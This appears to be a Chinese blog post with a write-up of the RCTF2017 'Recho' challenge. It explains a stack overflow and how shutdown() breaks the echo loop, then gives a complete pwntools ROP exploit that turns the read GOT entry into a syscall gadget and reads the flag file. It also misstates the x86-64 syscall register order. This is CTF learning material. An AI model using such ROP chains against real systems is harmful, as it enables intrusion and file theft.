RCTF2017之Recho
2017-05-26 本文已影响0人
bluecake
这道题到比赛结束时还是一脸懵逼,看了writeup才知道其实自己的思路已经接近了,不过还是有一些需要注意的点。
看一下主程序吧:
int __cdecl main(int argc, const char **argv, const char **envp)
{
Init(*(_QWORD *)&argc, argv, envp);
write(1, "Welcome to Recho server!\n", 0x19uLL);
while ( read(0, &nptr, 0x10uLL) > 0 )
{
v7 = atoi(&nptr);
if ( v7 <= 15 )
v7 = 16;
v6 = read(0, buf, v7);
buf[v6] = 0;
printf("%s", buf);
}
return 0;
}
很明显的栈溢出,但是有一个问题,这儿有一个死循环:在不断开连接的情况下read的返回值始终大于0(当然,如果我们可以控制read的长度为一个比较大的值,比如0x2000,这个时候再传入比较多的字符串,返回结果就可能为-1)
在当前情况下,唯一退出死循环的方法就只有关闭socket的读通道(对应的,在我们这端为写通道)。比赛的时候就只知道close这么个函数,而一旦调用close,就没有办法再输出数据了。今天的看了writeup,发现还可以调用shutdown函数来单独关闭读或写,有意思。
知道了思路后就是调试了,但如果调用shutdown函数来退出循环,连接很快就会断掉,进一步进程就会被杀死,这对我们的调试是一个很大的障碍。解决办法也比较简单, patch掉产生循环的指令,把ROP调试成功后再去测试shutdown退出循环。
另外一个知识点是int 80,syscenter,syscall这几种方式的传参方法。int 80和syscenter采用的同样的传参顺序:eax,ebx,ecx,edx。但是syscall的传参顺序居然变成了rdi,rsi,rdx,r10,r9,r8。之前一直认为这三种方式采用的是同样的传参方式。
好吧,问题基本就这些。下面是完整的利用脚本
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import time
from socket import *
local = 0
debug = 0
slog = 0
context.log_level= "DEBUG"
context.arch = 'amd64'
def pwn():
p = remote('127.0.0.1', 4444)
elf = ELF('./Recho')
time.sleep(0.5)
#gdb.attach(pidof('recho')[0], open('debug'))
p.recvuntil('server!')
p.sendline('1000')
time.sleep(0.5)
'''
recho
0x4006fc : pop rax ; ret
0x4008a3 : pop rdi ; ret
0x4006fe : pop rdx ; ret
0x4008a1 : pop rsi ; pop r15 ; ret
0x40070c : xchg eax, ebx ; add byte ptr [rdi], al ; ret
'''
pop_rax = 0x4006fc
pop_rdi = 0x4008a3
pop_rdx = 0x4006fe
pop_rsi_r15 = 0x4008a1
xchg_add_rdi_eax = 0x40070c
bss_addr = 0x601000 + 0x100
payload = 'a'*0x38 # padding
# change read to syscall
payload += p64(pop_rax) + p64(0xe)
payload += p64(pop_rdi) + p64(elf.got['read'])
payload += p64(xchg_add_rdi_eax)
payload += p64(xchg_add_rdi_eax)
# fd = open('flag')
payload += p64(pop_rax) + p64(int(constants.SYS_open))
payload += p64(pop_rdi) + p64(elf.symbols['flag'])
payload += p64(pop_rsi_r15) + p64(0) + p64(0xdeadbeef)
payload += p64(pop_rdx) + p64(0) + p64(elf.plt['read'])
# read(fd, bss_addr, 100)
payload += p64(pop_rax) + p64(int(constants.SYS_read))
payload += p64(pop_rdi) + p64(5) # in my system kali 2.0, fd is 5
# in remote machine, it may not be this
# but won't be very large
payload += p64(pop_rsi_r15) + p64(bss_addr) + p64(0xdeadbeef)
payload += p64(pop_rdx) + p64(20)+ p64(elf.plt['read'])
# write(fd, bss_addr, 100)
payload += p64(pop_rax) + p64(int(constants.SYS_write))
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15) + p64(bss_addr) + p64(0xdeadbeef)
payload += p64(pop_rdx) + p64(20)+ p64(elf.plt['read'])
p.sendline(payload)
p.shutdown("write")
p.interactive()
if __name__ == "__main__":
pwn()
